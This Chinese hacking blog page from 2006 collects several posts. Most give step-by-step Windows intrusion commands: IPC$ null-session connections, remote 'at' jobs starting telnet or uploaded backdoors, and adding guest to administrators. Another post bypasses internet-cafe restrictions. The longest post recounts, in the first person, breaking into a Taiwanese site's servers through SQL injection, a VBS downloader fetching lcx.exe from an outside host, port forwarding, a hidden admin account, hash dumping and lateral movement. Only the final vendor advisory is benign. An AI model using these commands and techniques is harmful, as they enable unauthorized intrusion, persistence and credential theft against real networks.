IT博客-stone's blog-随笔分类-入侵检测

简单的命令控制同一局域网内的电脑

stone — Thu, 19 Oct 2006 20:05:00 GMT

今天给大家讲一下如何用简单的命令控制同一局域网内的电脑.方法很简单,但危害不容忽视.
我们学校机房都是WIN2000的操作系统,可以用来实现.大家看我演示
我的机器号是K3机房其它机器的号码也是这样按顺序排的，我的机器号是K3，我们就用K5做实验

使用条件：开放了23端口

nbtstat -an 察看本机的机型号吗
net use \k5     ’和K5号机建立连接
net time \k5    ’查看K5号机的当前时间
at \k5 19:26 /every:saturday net start telnet   ‘给K5号机新增一个计划，使它在每周六的晚上7：26打开TELNET服务，使我们可以远程登陆它
等到26分就可以登陆了
看，我们已经开启了对方的TELNET服务并登陆对方机器，因为是同一局域网，所以可以方便的上传些东西
因为建立了连接所以可以方便的进入对方目录
上传了个可以查看并杀掉对方进程的工具
这样把他电脑里的QQ都给关了，还有很多用处就有大家去想了
防范方法：net share ipc$ /del ’关闭IPC就可以了

stone 2006-10-20 04:05 发表评论

经典入侵模式

stone — Fri, 13 Oct 2006 18:45:00 GMT

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。
　　
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
　　
3. C:\>net time \\127.0.0.1
查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。
　　
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）
　　
5. C:\>net time \\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。
　　
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
　　
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
　　
8. C:\WINNT\system32>ntlm
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

stone 2006-10-14 02:45 发表评论

简单的破解网吧

stone — Thu, 12 Oct 2006 09:42:00 GMT

其实网吧的破解非常简单！
第一：你如果可以找到QQ邮箱，FOXMAIL，OUTLOOK，的中的其中一个，自己给自己发封带附件的信，到网吧去收信，会自动下载到硬盘。
第二：利用IE的标记下载。如 http://www.127.com/1.exe ">这就可以下载1.exe程序到本地的IE缓存。
第三：利用网页的插件下载东西。这个以前经常用。但是很都被封了。（ http://ddd.dudu.com ）这个是DUDU加速的插件下载地址。由于他是通过了验证的，所以系统并不屏蔽它。
第四：这个只针对逍遥游无盘系统的。打开IE里面的文件-->导入导出-->下一步-->下一步-->在里面输入G:\wincmd32\*.*在点旁边的浏览可以打开这个目录。这个目录里面是一个文件管理系统。可以通过他在G:\找到进程管理工具。把网管程序结束掉，就可以下载文件了。

stone 2006-10-12 17:42 发表评论

简单渗透内网

stone — Wed, 11 Oct 2006 20:17:00 GMT

内网渗透对于大型网络入侵非常重要，但我们要懂得一些基本的网络结构，防火墙的设置，如果面的DMZ的配置情况，需要掌握端口转发、信息收集、社会工程学的利用、密码破解等，这是我今天上午拿下一网站内网服务器的经历，没什么技术含量，写出来和菜鸟朋友们分享一下。
情况的起因：这几天没什么好玩的就去玩玩国外网站，国内的不敢玩了。。。。。。。。。。。
转去转来盯上一个中国台湾省的一个大站，有二十几个二级域名的分站点，这下好玩了。来点耐心，一个一个的分站去检测一下，一圈下来居然没收获，不是说站点越大入侵的机率越大嘛。于是再挑两个asp的站点看看，在一个不起眼的地方检测了一下搜索型注入，结果在搜索框里没过滤，便构造了一个注入点用nbsi跑起来。
不负众望，居然是一个sa权限的，接下来打算写一个webshell上去，才发现是数据库与web分离的，再看一下开放的端口，80、21、1433、3389都开开的，再看一下ip，是内网的，netstat -an看一下，所有的连接都是另一个内网ip,应该是其它服务器内网连接到这台数据库服务器上的,这只是一个小小的数据库服务器。
再在本机的cmd下通过网站ip telnet一下上面的端口，不通，看来我是被困死在这台数据库服务器上面了，呆然开了3389是登不上的，相信很多人都遇到这种情况过。
于是我便在nbsi执行命令处下写了一段vbs下载脚本上去：
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^" http://www.ncph.net/lcx.exe ^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >down.vbs
接着执行cscript down.vbs 还好，下载lcx.exe成功，位置为c:\c.exe
先来执行个端口转发看看，我知道他们的服务器都放在一个防火墙后面，但虽然外面不能访问里面，里面可以访问外面就好说了。
继续在nbsi里面执行：c:\c.exe -slave xxx.xxx.xx.xx 51 172.26.1.248 3389
在我的另一台3389肉机监听:c:\lcx.exe -listen 51 4489 ,因为我上网是adsl拔号上网，ip会变的，所以我干脆转发到我的3389肉机上面，一是安全，二是速度快，三是可以让它一直转发到上面。因为我3389肉机的3389端口已开放，所以我就转到4489上面了，然后用3389登录127.0.0.1:4489。
对了，还忘了建帐号，赶紧刷新nbsi建个隐藏帐号mghk$，这时c.exe 的进程并没有结束，所以转发仍没有断开，用建好的帐号直接进入.如图:

进去的第一件事当然是隐藏帐号了，以前按照网上的做法总是在用户管理里面看得到mghk$这个用户，玩久了也就知道怎么做最好了，在导出两个注册表后，并不用net user mghk$ /del来删除，以前木木告诉我这样删除，后来我是直接在用户管理里面删除，再导入注册表，再net localgroup administrators mghk$ 加入管理组，这里候我们去用户表里和用户管理里面都看不到，除非管理员用net localgroup administrators才可以看到，不过这几个字母打下来手都痛了，所以没几个管理员这样查看的，以至于我的几台3389肉机用了大半年了还安然无恙，当然是高速极品肉机哦。
第二件事就向他的内网进军，我想到的是立即要做三件事，一是获得管理员密码，如果管理员在线，可以用findpass抓一下，因为这台是windows2000的，也可以用pwdump抓密码哈希再用lc5在本机破解。二是安装嗅探，用cain比较好，因为我们现在上的是3389，三是上传一个扫描软件，内网扫描它网段的内网ip，因为内网扫描我们就已绕过防火墙了,可以得到很多有用信息。
密码没用findpass到，用pwdump抓了个哈希下来用一台肉机开着lc5跑密码，装了个cain，可win2000需要重启，这里就不重启了，以免打草惊蛇。
我传了个hscan上去，自己构造了一下字典，然后扫描172.16.1.1-172.16.1.255网段。还传了个ms06040上去，准备内网溢出。扫描一会得到结果，有不少开139，445的，还空连接成功，更令人兴备的是扫出来一个1433弱口令，还是sa的，当然这些在外网是扫不出来的，因为防火墙屏蔽了所有的外网连接，就只有主站通过80端口连出来的。
如图看结果：

我再传了一个sql.exe上去，准备连接mssql用户名和密码为sa的ip,执行命令，还好，它还开了3389，当我们真正进入到内网进行操作的时候才发现比平时从外网入侵容易多了。
直接执行命令，如图：

进去后再次登上另一台的3389，这台上面已经有部分网站了，再次抓了这台机器的哈希，发现哈希一至，所以应该他们所有的服务器密码都是一至，只等我挂在肉机上的哈希密码跑出来就ok了，一般三天时间就跑出来，这样就可以宣布彻底搞定这个网站的所有服务器，大至登了一下，有八十几台服务器，台湾人真有钱。

stone 2006-10-12 04:17 发表评论

Sun Java System Content Delivery Server信息泄露漏洞

stone — Mon, 09 Oct 2006 22:34:00 GMT

受影响系统：
Sun Java System Content Delivery Server 5.0
Sun Java System Content Delivery Server 4.1
Sun Java System Content Delivery Server 4.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 19705

Sun Java System Content Delivery Server可为移动用户提供可以下载的数据服务。

Sun Java System Content Delivery Server的实现上存在漏洞，本地或远程非特权用户可能利用此漏洞读取系统上任意文件的数据。

<*来源：Sun Alert Notification

链接： http://secunia.com/advisories/21628/
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102593-1
*>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-102593）以及相应补丁:
Sun-Alert-102593：Security Vulnerability in the Sun Java System Content Delivery Server May Allow Unauthorized Data Access
链接： http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102593-1

stone 2006-10-10 06:34 发表评论